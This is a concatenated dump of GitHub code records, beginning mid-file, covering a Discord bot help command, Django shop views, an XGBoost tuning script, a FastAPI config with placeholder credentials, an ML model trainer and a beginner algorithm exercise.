guild=ctx.guild.id), 16))\n\t\t\t\tif command.aliases:\n\t\t\t\t\tembed.add_field(name=\"Aliases\", value=\", \".join(command.aliases), inline=False)\n\t\t\t\telse:\n\t\t\t\t\tembed.add_field(name=\"Aliases\", value=\"None\")\n\t\t\t\tembed.add_field(name=\"⚠️ Parameters\", value=command.brief)\n\t\t\t\tembed.add_field(name=\"🔒 Permissions\", value=command.usage)\n\t\t\t\tif command.help:\n\t\t\t\t\tusage=command.help\n\t\t\t\t\tembed.add_field(name=\"📲 Usage\", value=f\"{usage}\", inline=False)\n\t\t\t\tembed.set_footer(text=f\"Module: {command.cog_name}.py\")\n\t\t\t\tchannel = self.get_destination()\n\t\t\t\tawait channel.send(embed=embed)\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\n\n\tasync def send_group_help(self, group):\n\t\tctx=self.context\n\t\tbot = ctx.bot\n\t\tasync with ctx.typing():\n\t\t\tif isinstance(group, commands.Group):\n\t\t\t\tfiltered = await self.filter_commands(group.commands, sort=False)\n\t\t\t\ttot = len(group.commands)\n\t\t\t\tprint(tot)\n\t\t\t\tembedss=[]\n\t\t\t\ttry:\n\t\t\t\t\tfor i in filtered:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tfor ii in i.walk_commands():\n\t\t\t\t\t\t\t\ttot+=1\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\t\ttry:\n\t\t\t\t\tembed1 = discord.Embed(color=int(await get_theme(self, bot=bot, guild=ctx.guild.id), 16))\n\t\t\t\t\tembed1.set_author(name=ctx.author.display_name, icon_url=ctx.author.display_avatar)\n\t\t\t\t\tif group.brief:\n\t\t\t\t\t\tembedss.append(embed1)\n\t\t\t\t\t\ttot +=1\n\t\t\t\t\t\tembed1.add_field(name=\"⚠️ Parameters\", value=group.brief)\n\n\t\t\t\t\t\tembed1.set_footer(text=\"Aliases: \" + \", \".join(group.aliases)+f\" ・ Module: {group.cog_name}.py ・ Entry: ({len(embedss)}/{tot} entries)\")\n\t\t\t\t\tif group.usage:\n\t\t\t\t\t\tembed1.add_field(name=\"🔒 Permissions\", value=group.usage)\n\t\t\t\t\tif group.description:\n\t\t\t\t\t\tembed1.title=f\"Group Command: {group.qualified_name}\"\n\t\t\t\t\t\tembed1.description=group.description\n\t\t\t\t\tif group.help:\n\t\t\t\t\t\tusage=group.help\n\t\t\t\t\t\tembed1.add_field(name=\"📲 Usage\", value=f\"{usage}\", inline=False)\n\t\t\t\t\t\tembed1.title=f\"Group Command: {group.qualified_name}\"\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(e); pass\n\t\t\t\tfor command in filtered:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tfor commandd in command.walk_commands():\n\t\t\t\t\t\t\temb2 = discord.Embed(color=int(await get_theme(self, bot=bot, guild=ctx.guild.id), 16))\n\t\t\t\t\t\t\temb2.set_author(name=ctx.author.display_name, icon_url=ctx.author.display_avatar)\n\t\t\t\t\t\t\tif commandd.brief:\n\t\t\t\t\t\t\t\tembedss.append(emb2)\n\t\t\t\t\t\t\t\temb2.add_field(name=\"⚠️ Parameters\", value=commandd.brief)\n\t\t\t\t\t\t\t\temb2.set_footer(text=\"Aliases: \" + \", \".join(commandd.aliases)+f\" ・ Module: {commandd.cog_name}.py ・ Entry: ({len(embedss)}/{tot} entries)\")\n\t\t\t\t\t\t\tif commandd.usage:\n\t\t\t\t\t\t\t\temb2.add_field(name=\"🔒 Permissions\", value=commandd.usage)\n\t\t\t\t\t\t\tif commandd.description:\n\t\t\t\t\t\t\t\temb2.title=f\"Command: {commandd.qualified_name}\"\n\t\t\t\t\t\t\t\temb2.description=commandd.description\n\t\t\t\t\t\t\tif commandd.help:\n\t\t\t\t\t\t\t\tusage=commandd.help\n\t\t\t\t\t\t\t\temb2.add_field(name=\"📲 Usage\", value=f\"{usage}\", inline=False)\n\t\t\t\t\t\t\t\temb2.title=f\"Command: 
{commandd.qualified_name}\"\n\t\t\t\t\texcept:\n\t\t\t\t\t\tpass\n\t\t\t\t\t#tot += 1\n\t\t\t\t\temb = discord.Embed(color=int(await get_theme(self, bot=bot, guild=ctx.guild.id), 16))\n\t\t\t\t\temb.set_author(name=ctx.author.display_name, icon_url=ctx.author.display_avatar)\n\t\t\t\t\tif command.brief:\n\t\t\t\t\t\tembedss.append(emb)\n\t\t\t\t\t\temb.add_field(name=\"⚠️ Parameters\", value=command.brief)\n\t\t\t\t\t\temb.set_footer(text=\"Aliases: \" + \", \".join(command.aliases)+f\" ・ Module: {command.cog_name}.py ・ Entry: ({len(embedss)}/{tot} entries)\")\n\t\t\t\t\tif command.usage:\n\t\t\t\t\t\temb.add_field(name=\"🔒 Permissions\", value=command.usage)\n\t\t\t\t\tif command.description:\n\t\t\t\t\t\temb.title=f\"Command: {command.qualified_name}\"\n\t\t\t\t\t\temb.description=command.description\n\t\t\t\t\tif command.help:\n\t\t\t\t\t\tusage=command.help\n\t\t\t\t\t\temb.add_field(name=\"📲 Usage\", value=f\"{usage}\", inline=False)\n\t\t\t\t\t\temb.title=f\"Command: {command.qualified_name}\"\n\n\t\t\t\tpaginator = pg.Paginator(ctx.bot, embedss, ctx, invoker=ctx.author.id)\n\t\t\t\tif len(embedss) > 1:\n\t\t\t\t\tpaginator.add_button('prev', emoji='', style=discord.ButtonStyle.blurple)\n\t\t\t\t\t#paginator.add_button('first', emoji='<:Settings:921574525815103528>', style=discord.ButtonStyle.green)\n\t\t\t\t\tpaginator.add_button('next', emoji='<:right:921574372693651517>', style=discord.ButtonStyle.blurple)\n\t\t\t\t\tpaginator.add_button('goto', emoji='🔢', style=discord.ButtonStyle.grey)\n\t\t\t\treturn await paginator.start()\n\n\n\n\n\n\tasync def on_help_command_error(self, ctx, error):\n\t\t\ttry:\n\t\t\t\tif isinstance(error, commands.BadArgument):\n\t\t\t\t\tmember = ctx.message.author\n\t\t\t\t\tem = discord.Embed(title=f\" __**Help Panel**__\", description=str(error), color=0xeb041c, timestamp=ctx.message.created_at)\n\t\t\t\t\tem.set_footer(text=f\" Requested by: {ctx.message.author}\")\n\t\t\t\t\tem.add_field(name=f\"__**All Commands:**__\", value='``;cmds``', inline=False)\n\t\t\t\t\tem.add_field(name=f\"__**Command Help:**__\", value=\"``;help [cmd]``\", inline=False)\n\t\t\t\t\tem.add_field(name=f\"__**All Categories:**__\", value='``;categories``', inline=False)\n\t\t\t\t\tem.add_field(name=f\"**links:**\", value=\"[Support serv](https://discord.gg/EGj2GzpU9s) | [Inv blame w/o perms](https://discord.com/api/oauth2/authorize?client_id=776128410547126322&permissions=0&scope=bot) | [Inv blame with perms](https://discord.com/api/oauth2/authorize?client_id=776128410547126322&permissions=8&scope=bot)\", inline=True)\n\t\t\t\t\tawait ctx.send(embed=em)\n\t\t\t\telse:\n\t\t\t\t\traise error\n\t\t\texcept Exception as e:\n\t\t\t\tprint(e)\n\t\t\t\tpass\n","repo_name":"inadvertently/Blame","sub_path":"Core/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":12207,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"91"}
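# Editor's sketch: the Dropdown / DropdownView pattern from the record above, reduced
# to its skeleton. The labels and the reply text are placeholders; only the
# discord.ui.Select / discord.ui.View wiring mirrors the original file.
import discord

class MiniSelect(discord.ui.Select):
    def __init__(self):
        options = [discord.SelectOption(label="General"),
                   discord.SelectOption(label="Tags")]
        super().__init__(placeholder="General", min_values=1, max_values=1,
                         options=options)

    async def callback(self, interaction: discord.Interaction):
        # self.values holds the labels the user picked in the dropdown
        await interaction.response.send_message(f"picked {self.values[0]}")

class MiniView(discord.ui.View):
    def __init__(self):
        super().__init__()
        self.add_item(MiniSelect())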
+{"seq_id":"8821564246","text":"from django.shortcuts import redirect, render\nfrom .models import Producto, Categoria\nfrom .forms import ProductoForm\n\n\n# Create your views here.\n\n\ndef home(request):\n    return render(request, \"core/home.html\")\n\n\ndef producto_tienda(request):\n    data = {\"list\": Producto.objects.all().order_by('id')}\n    return render(request, \"core/producto_tienda.html\", data)\n\n\ndef producto_ficha(request, id):\n    producto = Producto.objects.get(id=id)\n    data = {\"producto\": producto}\n    return render(request, \"core/producto_ficha.html\", data)\n\n\ndef producto(request, action, id):\n    data = {\"mesg\": \"\", \"form\": ProductoForm, \"action\": action, \"id\": id}\n\n\n    if action == 'ins':\n        if request.method == \"POST\":\n            form = ProductoForm(request.POST, request.FILES)\n            if form.is_valid():\n                try:\n                    form.save()\n                    data[\"mesg\"] = \"The product was created successfully!\"\n                except Exception:\n                    data[\"mesg\"] = \"Two products cannot be created with the same ID!\"\n\n\n    elif action == 'upd':\n        objeto = Producto.objects.get(id=id)\n        if request.method == \"POST\":\n            form = ProductoForm(data=request.POST, files=request.FILES, instance=objeto)\n            if form.is_valid():\n                form.save()\n                data[\"mesg\"] = \"The product was updated successfully!\"\n        data[\"form\"] = ProductoForm(instance=objeto)\n\n\n    elif action == 'del':\n        try:\n            Producto.objects.get(id=id).delete()\n            data[\"mesg\"] = \"The product was deleted successfully!\"\n            return redirect(producto, action='ins', id = '-1')\n        except Exception:\n            data[\"mesg\"] = \"The product was already deleted!\"\n\n\n    data[\"list\"] = Producto.objects.all().order_by('id')\n    return render(request, \"core/producto.html\", data)\n\ndef poblar_bd(request):\n    Producto.objects.all().delete()\n    Producto.objects.create(id=\"0001\", nombre='Dog Chow', descripcion=\"Dog Chow adulto\", precio='$10.000', descuento_sub='5%', descuento_oferta='10%', imagen=\"images/dogChow18KG\", categoria=Categoria.objects.get(idCategoria=1))\n    Producto.objects.create(id=\"0002\", nombre='Dog Chow', descripcion=\"Dog Chow adulto\", precio='$13.500', descuento_sub='5%', descuento_oferta='5%', imagen=\"images/dogChow18KG\", categoria=Categoria.objects.get(idCategoria=2))\n    Producto.objects.create(id=\"0003\", nombre='Dog Chow', descripcion=\"Dog Chow adulto\", precio='$15.000', descuento_sub='5%', descuento_oferta='17%', imagen=\"images/dogChow18KG\", categoria=Categoria.objects.get(idCategoria=3))\n    Producto.objects.create(id=\"0004\", nombre='Dog Chow', descripcion=\"Dog Chow adulto\", precio='$9.000', descuento_sub='5%', descuento_oferta='22%', imagen=\"images/dogChow18KG\", categoria=Categoria.objects.get(idCategoria=1))\n    Producto.objects.create(id=\"0005\", nombre='Dog Chow', descripcion=\"Dog Chow adulto\", precio='$8.500', descuento_sub='5%', descuento_oferta='30%', imagen=\"images/dogChow18KG\", categoria=Categoria.objects.get(idCategoria=2))\n    Producto.objects.create(id=\"0006\", nombre='Dog Chow', descripcion=\"Dog Chow adulto\", precio='$15.500', descuento_sub='5%', descuento_oferta='8%', imagen=\"images/dogChow18KG\", categoria=Categoria.objects.get(idCategoria=3))\n    Producto.objects.create(id=\"0007\", nombre='Dog Chow', descripcion=\"Dog Chow adulto\", precio='$12.000', descuento_sub='5%', descuento_oferta='15%', imagen=\"images/dogChow18KG\", categoria=Categoria.objects.get(idCategoria=1))\n    Producto.objects.create(id=\"0008\", nombre='Dog Chow', descripcion=\"Dog Chow adulto\", precio='$8.000', descuento_sub='5%', descuento_oferta='21%', imagen=\"images/dogChow18KG\", categoria=Categoria.objects.get(idCategoria=2))\n    \n    return redirect(producto, action='ins', id = '-1')","repo_name":"iahumadaz/PetShop-Django-B","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3792,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
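# Editor's note: forms.py is not included in the record above; a minimal ModelForm
# consistent with how ProductoForm is used there (bound with request.POST plus
# request.FILES, saving an `imagen` field) might look like this. The field list is an
# assumption inferred from the poblar_bd seed rows, not the project's actual form.
from django import forms
from .models import Producto

class ProductoForm(forms.ModelForm):
    class Meta:
        model = Producto
        fields = ['id', 'nombre', 'descripcion', 'precio', 'descuento_sub',
                  'descuento_oferta', 'imagen', 'categoria']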
+{"seq_id":"69960079985","text":"import os\nimport re\nimport setuptools\nimport sys\n\nif sys.version_info[:2] < (3, 6):\n print(\"ERROR: this package requires Python 3.7 or later!\")\n sys.exit(1)\n# if sys.version_info[:2] >= (3, 9):\n# # This is because of a pickling issue. Maybe dill needs a PR?\n# print(\"ERROR: this package cannot run on Python 3.9 or later!\")\n# sys.exit(1)\n\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nwith open(os.path.join(\"fastmap\", \"sdk_lib.py\")) as f:\n version = re.search(r\"^CLIENT_VERSION \\= \\\"([0-9.]+)\\\"\", f.read(),\n re.MULTILINE).group(1)\n\nurl_base = \"https://github.com/fastmap-io/fastmap\"\ndownload_url = '%s/archive/fastmap-%s.tar.gz' % (url_base, version)\n\nsetuptools.setup(\n name=\"fastmap\",\n version=version,\n author=\"fastmap.io team\",\n author_email=\"scott@fastmap.io\",\n description=\"Fastmap offloads arbitrary Python code \"\n \"via the open source fastmap cloud service.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=url_base,\n download_url=download_url,\n packages=setuptools.find_packages(),\n scripts=[\n \"scripts/fastmap\",\n \"scripts/fastmapadmin\",\n ],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.7',\n install_requires=[\n \"dill>=0.3.2,<0.4\",\n \"msgpack>=1.0.0,<1.1.0\",\n \"requests>=2.24,<3.0\",\n \"tabulate>=0.8.7,<0.9.0\",\n ],\n)\n","repo_name":"fastmap-io/fastmap","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"91"}
+{"seq_id":"33312935639","text":"from django.contrib import admin\nfrom .models import Specification\n\n# Register your models here.\n\nclass NotifyAdmin(admin.ModelAdmin):\n list_display = ('id','user_id','name', 'created_date','brand','model','body_style','fuel','transmission','color','year','milage','min_price','max_price')\n list_display_links = ('user_id','name')\n search_fields = ('user_id','name')\n\n readonly_fields=[\n 'user_id',\n 'name', \n 'created_date',\n 'brand',\n 'model',\n 'body_style',\n 'fuel',\n 'transmission',\n 'color',\n 'year',\n 'milage',\n 'min_price',\n 'max_price',\n ]\n\nadmin.site.register(Specification, NotifyAdmin)\n","repo_name":"codesentry17/thisIsEverything","sub_path":"notify/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"14915086661","text":"# decision tree for multioutput regression\nfrom scipy.sparse import data\nfrom sklearn.datasets import make_regression\nfrom xgboost import XGBRegressor\nfrom sklearn.multioutput import MultiOutputRegressor\nfrom sklearn.model_selection import train_test_split as ttsplit\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import mean_squared_error\nimport numpy as np \nfrom copy import deepcopy\nimport pandas as pd\n# import warnings filter\nfrom warnings import simplefilter\nfrom hyperopt import STATUS_OK, Trials, fmin, hp, tpe\n\n\nimport ast\n\ndef convert_list_string_to_list_float(strings):\n # Converting string to list\n values = []\n for s in strings:\n value = []\n for x in s.split( ):\n try:\n value.append(float(x.strip(' []')))\n except:\n pass\n values.append(value)\n return values\n\n# ignore all future warnings\nsimplefilter(action='ignore')\n\nclass XGBRegressor(XGBRegressor):\n def partial_fit(self, X, y, *params):\n super().fit(X, y,*params, xgb_model=super().get_booster())\n\ndef flatten(t):\n return [item for sublist in t for item in sublist]\n\ndef get_dataset(path):\n dataset = pd.read_csv(path,';')\n\n rewards = dataset['reward']\n obs = convert_list_string_to_list_float(dataset[\"actual_state\"])\n next_obs = convert_list_string_to_list_float(dataset[\"next_state\"])\n actions = dataset['action']\n\n targets_f = np.zeros((len(obs),26))\n \n for i, action in enumerate(actions):\n targets_f[i][action] = rewards[i]\n\n X, y = np.array(obs),targets_f\n return X,y\n\ndef split_test(X,y):\n X,Xt,y,yt = ttsplit(X, y, test_size=0.33, random_state=42)\n\n X_ = []\n y_ = []\n for _,y_index in KFold(n_splits=4).split(X):\n X_.append(X[y_index])\n y_.append(y[y_index])\n\n # define model\n model = MultiOutputRegressor(XGBRegressor())\n model2 = MultiOutputRegressor(XGBRegressor())\n\n print(\"Test 1\")\n model.fit(X, y)\n # make a prediction\n print(\"\\tFit all X and y:\",mean_squared_error(yt,model.predict(Xt)))\n\n model2.fit(X_[0], y_[0] )\n model3 = deepcopy(model2)\n # make a prediction\n print(\"\\tFit only X_[0] and y_[0]:\",mean_squared_error(yt,model2.predict(Xt)))\n\n model3.partial_fit(X_[1], y_[1] )\n model4 = deepcopy(model3)\n # make a prediction\n print(\"\\tFit partial X_[1] and y_[1]:\",mean_squared_error(yt,model3.predict(Xt)))\n\n model4.partial_fit(X_[2], y_[2] )\n model5 = deepcopy(model4)\n # make a prediction\n print(\"\\tFit partial X_[2] and y_[2]:\",mean_squared_error(yt,model4.predict(Xt)))\n\n model5.partial_fit(X_[3], y_[3] )\n # make a prediction\n print(\"\\tFit partial X_[3] and y_[3]:\",mean_squared_error(yt,model5.predict(Xt)))\n\n print(\"Test 2\")\n\n # define model\n model = MultiOutputRegressor(XGBRegressor())\n model2 = MultiOutputRegressor(XGBRegressor())\n\n # fit all the model\n model.fit(X, y)\n # make a prediction\n print(\"\\tFit all X and y:\",mean_squared_error(yt,model.predict(Xt)))\n\n model2.fit(flatten(X_[0:1]), flatten(y_[0:1]) )\n model3 = deepcopy(model2)\n # make a prediction\n print(\"\\tFit only X_[0:1] and y_[0:1]:\",mean_squared_error(yt,model2.predict(Xt)))\n\n model3.partial_fit(flatten(X_[0:2]),flatten(y_[0:2]))\n model4 = deepcopy(model3)\n # make a prediction\n print(\"\\tFit partial X_[0:2] and y_[0:2]:\",mean_squared_error(yt,model3.predict(Xt)))\n\n model4.partial_fit(flatten(X_[1:3]), flatten(y_[1:3]) )\n model5 = deepcopy(model4)\n # make a prediction\n print(\"\\tFit partial X_[1:3] and y_[1:3]:\",mean_squared_error(yt,model4.predict(Xt)))\n\n 
model5.partial_fit(flatten(X_[2:4]), flatten(y_[2:4]))\n    # make a prediction\n    print(\"\tFit partial X_[2:4] and y_[2:4]:\",mean_squared_error(yt,model5.predict(Xt)))\n\n\ndef objective(space):\n\n    global X,Xt,y,yt\n\n    clf = MultiOutputRegressor(XGBRegressor(\n        n_estimators=int(space['n_estimators']), max_depth=int(space['max_depth']), gamma=space['gamma'],\n        reg_alpha=space['reg_alpha'], reg_lambda=space['reg_lambda'],\n        min_child_weight=space['min_child_weight'],\n        colsample_bytree=space['colsample_bytree']))  # colsample_bytree was sampled in the search space but never used before\n\n    clf.fit(X, y)\n\n    pred = clf.predict(Xt)\n    mse = mean_squared_error(yt, pred)  # this is a mean squared error, not an accuracy\n    print(\"SCORE:\", mse)\n    return {'loss': mse, 'status': STATUS_OK}\n\ndef hypertune_parameters():\n    space = {'max_depth': hp.quniform(\"max_depth\", 3, 20, 1),\n        'gamma': hp.uniform('gamma', 1, 9),\n        'reg_alpha': hp.quniform('reg_alpha', 40, 180, 1),\n        'reg_lambda': hp.uniform('reg_lambda', 0, 1),\n        'colsample_bytree': hp.uniform('colsample_bytree', 0.5, 1),\n        'min_child_weight': hp.quniform('min_child_weight', 0, 10, 1),\n        'n_estimators': hp.quniform(\"n_estimators\", 100, 200, 5),\n        'seed': 0\n    }\n\n    trials = Trials()\n\n    best_hyperparams = fmin(fn=objective,\n                            space=space,\n                            algo=tpe.suggest,\n                            max_evals=500,\n                            trials=trials)\n\n    print(best_hyperparams)\n\n\nX_data, y_data = get_dataset(\"../agent/configs_xqn/buffer.csv\")\nX, Xt, y, yt = ttsplit(X_data, y_data, test_size=0.30, random_state=42)\n\nprint(f\"Training data size: {len(X)}\")\nprint(f\"Test data size: {len(Xt)}\")\n\n#split_test(X,y)\nhypertune_parameters()\n","repo_name":"LincolnVS/explainable-drl-traffic-lights","sub_path":"scripts/xgboost_teste.py","file_name":"xgboost_teste.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"91"}
+{"seq_id":"9636322289","text":"\"\"\"\n@Time : 2021/11/16 13:58\n@Author : Musuer\n@Contact : linxuzhao2018@163.com\n@File : config.py\n@Software: PyCharm\n\"\"\"\n# 生产模式为 1 线上 0 本地\nPRODUCT = 0\n# 启动模式\nRUN_DEBUG: bool = False if PRODUCT else True\n\n# 使用 uvion 项目启动配置\nAPP_RUN_CONFIG = {\n 'host': '0.0.0.0', # 启动 host\n 'port': 81, # 启动 port 端口\n 'reload': RUN_DEBUG # 是否已 reload 模式启动 默认与当前生产模式有关`\n}\n\n# swagger_ui 设置\nSWAGGER_UI = {\n 'title': 'FastApiProject', # 标题\n 'version': 'v1',\n # description 使用 markdown 语法\n 'description': '''# 项目描述\n......\n ''', # 描述\n 'docs_url': '/openapi/docs', # openapi 文档地址 默认为 docs 此处修改为 /openapi/docs\n 'openapi_url': '/openapi/openapi.json', # 文档关联请求数据接口\n 'redoc_url': '/openapi/redoc', # redoc 文档\n # 'terms_of_service': 'http://example.com/terms/',\n # 'contact': {\n # \"name\": \"Deadpoolio the Amazing\",\n # \"url\": \"http://x-force.example.com/contact/\",\n # \"email\": \"dp@x-force.example.com\",\n # },\n 'license_info': {\n \"name\": \"Apache 2.0\",\n \"url\": \"https://www.apache.org/licenses/LICENSE-2.0.html\",\n },\n # 接口描述\n 'openapi_tags': [\n {\n \"name\": \"test\",\n \"description\": \"openapi docs 中该接口的描述\",\n # \"externalDocs\": { # 额外三方 url\n # \"description\": \"Items external docs\",\n # \"url\": \"https://fastapi.tiangolo.com/\",\n # },\n },\n\n ]\n}\n\n# jwt 密钥\nSECRET_KEY = \"xxxxxxxxxxxxxx\"\n# 加密方式\nALGORITHM = \"HS256\"\n\n# 数据库地址 用户名:密码@主机:端口/数据库名\nDATABASE_URLS = {\n 'default': {\n 'user': '这里是用户名',\n 'password': '这里是用户密码',\n 'host': (PRODUCT == 1) and '127.0.0.1' or 'x.x.x.x', # 此处 host 自行设计若服务与mysql同属一个服务器可以采取\n 'port': 3306,\n 'database': '选择的数据库',\n 'charset': 'utf8mb4',\n },\n 'app_1_db': {\n 'user': 'root',\n 'password': 'xxxx',\n 'host': '127.0.0.1',\n 'port': 3306,\n 'database': 'cps',\n 'charset': 'utf8mb4',\n }\n}\n\n# redis 链接\nREDIS_URL = \"redis://127.0.0.1:6379/1\"\n\n# tortoise-orm 配置可以获取上方\nTORTOISE_ORM = {\n 'connections': {\n # # Dict format for connection\n # 'default': {\n # 'engine': 'tortoise.backends.mysql',\n # 'credentials': DATABASE_URLS.get('default')\n # },\n 'app_1': {\n 'engine': 'tortoise.backends.mysql',\n 'credentials': DATABASE_URLS.get('app_1_db')\n },\n },\n 'apps': {\n 'models': {\n # 'models': ['aerich.models', 'app_1.orm.models'],\n 'models': ['aerich.models', 'FastApiProject.orm.models'],\n # If no default_connection specified, defaults to 'default'\n 'default_connection': 'app_1', # connections中的配置默认\n }\n }\n}\n\n# 时区\nTIME_ZONE = 'Asia/Shanghai' # 数据库返回接口时使用\n","repo_name":"ItGarbager/FastApiProject","sub_path":"FastApiProject/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"13452181357","text":"import os\nimport sys\nfrom dataclasses import dataclass\n\nfrom sklearn.ensemble import AdaBoostClassifier, GradientBoostingClassifier, RandomForestClassifier\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.metrics import classification_report\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import Ridge\nfrom xgboost import XGBClassifier\nfrom catboost import CatBoostClassifier\nfrom sklearn.metrics import accuracy_score\n\n\nfrom src.exception import CustomException\nfrom src.logger import logging\nfrom src.utils import save_object, evaluate_models\n\n@dataclass\nclass ModelTrainerConfig:\n trained_model_file_path = os.path.join('artifacts','model.pkl')\n\nclass ModelTrainer:\n def __init__(self):\n self.model_trainer_config = ModelTrainerConfig()\n\n def initiate_model_trainer(self,input_train_array,input_test_array,target_train_array,target_test_array):\n try:\n logging.info(\"Splitting training and test input\")\n\n X_train, y_train, X_test, y_test = (\n input_train_array,\n target_train_array,\n input_test_array,\n target_test_array\n )\n\n print(\"X_train shape : \",X_train.shape)\n print(\"y_train shape :\", y_train.shape)\n\n models = {\n \"Naive Bayes\" : MultinomialNB(),\n \"Gradient Boosting\" : GradientBoostingClassifier(),\n \"Random Forest Classifier\" : RandomForestClassifier(),\n \"CatBoost Classifier\" : CatBoostClassifier(verbose = False),\n \"XGBoost Classifier\" : XGBClassifier(),\n \"Ridge\" : Ridge(),\n \"Ada Boost Regressor\" : AdaBoostClassifier(),\n \"KNeighbors Classifier\" : KNeighborsClassifier()\n }\n\n # params = {\n # \"Naive Bayes\": {\n # \"alpha\": [0.1, 1.0, 10.0]\n # },\n # \"Gradient Boosting\": {\n # \"n_estimators\": [50, 100, 200],\n # \"learning_rate\": [0.01, 0.1, 0.2]\n # },\n # \"Random Forest Classifier\": {\n # \"n_estimators\": [50, 100, 200],\n # \"max_depth\": [None, 10, 20],\n # \"min_samples_split\": [2, 5, 10]\n # },\n # \"CatBoost Classifier\": {\n # \"iterations\": [50, 100, 200],\n # \"learning_rate\": [0.01, 0.1, 0.2]\n # },\n # \"XGBoost Classifier\": {\n # \"n_estimators\": [50, 100, 200],\n # \"learning_rate\": [0.01, 0.1, 0.2]\n # },\n # \"Ridge\": {\n # \"alpha\": [0.01, 0.1, 1.0]\n # },\n # \"Ada Boost Regressor\": {\n # \"n_estimators\": [50, 100, 200],\n # \"learning_rate\": [0.01, 0.1, 0.2]\n # },\n # \"KNeighbors Classifier\": {\n # \"n_neighbors\": [3, 5, 7],\n # \"weights\": [\"uniform\", \"distance\"]\n # }\n # }\n\n model_report:dict = evaluate_models(X_train = X_train, y_train = y_train,\n X_test = X_test, y_test = y_test, models = models)\n \n best_model_score = max(sorted(model_report.values()))\n best_model_name = list(model_report.keys())[\n list(model_report.values()).index(best_model_score)\n ]\n best_model = models[best_model_name]\n\n if best_model_score < 0.6:\n raise CustomException(\"No best model found\")\n \n logging.info(\"Best found model on both training and testing dataset\")\n\n save_object(\n file_path=self.model_trainer_config.trained_model_file_path,\n obj=best_model\n )\n\n predicted = best_model.predict(X_test)\n best_report = accuracy_score(y_test, predicted)\n print(\"The best model was :\", best_model_name, \" with an accuracy of\")\n return best_report\n\n\n\n except Exception as e:\n raise 
CustomException(e,sys)\n","repo_name":"ani7fx/ecom-sentiment-analysis","sub_path":"src/components/model_trainer.py","file_name":"model_trainer.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"2311169752","text":"# program to find the largest of number in the iterable with time complexity theta(n)\n# it will use two traversals\nlist_of_numbers = [4, 3, 2, 1]\n\n\ndef function_to_find_largest_number_with_theta_n(iterable):\n \"\"\"\n :param iterable:\n :return: largest number from the list\n since one loops are involved and one is inner loop \\\n where n = length of list hence the time complexity is theta (n)\n \"\"\"\n\n comparing_value = iterable[0]\n n = len(iterable)\n if not n:\n return None\n for i in range(1, n):\n if iterable[i] > comparing_value:\n comparing_value = iterable[i]\n return comparing_value\n\n\n# traversal 1\nlargest_number = function_to_find_largest_number_with_theta_n(list_of_numbers)\nsecond_largest = None\nfor i in list_of_numbers:\n if i != largest_number:\n if second_largest is None:\n second_largest = i\n else:\n second_largest = max(second_largest, i) # traversal 2\n\nprint(\"Second_largest number is: {}\".format(second_largest))\n\n# efficient solution to handle the above case with one traversal\n# case 1:\n# suppose we get the largest and second largest from the list from l0 to ln-1 \\\n# comparsion is made between ln-1 and ln. if ln is > ln-1 then largest becomes ln\n# case 2:\n# suppose we get the largest and second largest from the list from l0 to ln-1 \\\n# comparsion is made between ln-1 and ln. if ln is < ln-1\n# case 2.1\n# if ln > second_largest\n# second_largest = ln\n# case 2.2\n# if ln < second_largest or second largest is none \\\n# ignore in this case\n# case 3\n# if ln == ln-1 then also ignore this case\n\n\ndef second_largest_with_one_traversal(iterable):\n if len(iterable) <= 1:\n return None\n lar = iterable[0]\n slar = None\n for x in iterable[1:]:\n if x > lar:\n slar = iterable[0]\n lar = x\n elif x != lar:\n if slar is None or slar < x:\n slar = x\n return slar\n\n\nsecond_largest = second_largest_with_one_traversal(iterable=list_of_numbers)\nprint(\"Second_largest number is: {}\".format(second_largest))\n\n","repo_name":"sanpreet/Python-basics-code","sub_path":"second_largest_with_time_complexity.py","file_name":"second_largest_with_time_complexity.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"20721145006","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.IndexView.as_view(), name='index'),\n url(r'^update/(?P\\d+)/$', views.CompanyUpdateView.as_view(), name='update'),\n url(r'^delete/(?P\\d+)/$', views.delete, name='delete'),\n url(r'^add/$', views.add, name='add'),\n url(r'^save/$', views.save, name='save'),\n]\n","repo_name":"hekaber/companies_site","sub_path":"companies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
